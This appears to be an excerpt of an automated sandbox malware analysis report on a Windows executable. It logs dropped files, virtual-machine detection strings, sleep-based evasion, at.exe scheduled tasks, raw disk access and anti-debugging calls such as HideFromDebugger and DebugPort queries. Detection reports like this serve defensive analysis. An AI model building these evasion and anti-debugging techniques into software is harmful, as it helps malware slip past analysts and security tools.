File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 1_2_02289F5D rdtsc

Source: C:\Windows\System\svchost.exe

Window / User API: threadDelayed 489

Source: C:\Windows\System\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Windows\System\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe TID: 6252	Thread sleep count: 31 > 30
Source: C:\Windows\System\explorer.exe TID: 6388	Thread sleep count: 151 > 30
Source: C:\Windows\System\svchost.exe TID: 6444	Thread sleep count: 489 > 30
Source: C:\Windows\System32\svchost.exe TID: 6656	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: svchost.exe, 00000007.00000002.499902779.0000017AF2861000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.499878626.0000017AF284E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000019.00000002.494012893.000002A269202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: os9tzxfmtz.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000019.00000002.494093401.000002A269228000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.493190369.000001E1C2829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\icsys.icn.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 1_2_02280A61 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0228A5E4,F21FD920,02280997

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 1_2_02289F5D rdtsc

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: 1_2_02284DE5 LdrInitializeThunk,

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228906B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02282E3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02282651 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02287EE5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02287F4B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02284443 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022890AB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022890B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02286C83 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022890F7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289137 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283168 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283166 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022831AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E434257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E45B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E45B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E45FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4246A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E478F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E47070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E47070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4253CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4253CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E45D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E475BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E43C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E471074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E462073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E426C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E47740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E474015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E474015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E427016 mov eax, dword ptr fs:[00000030h]
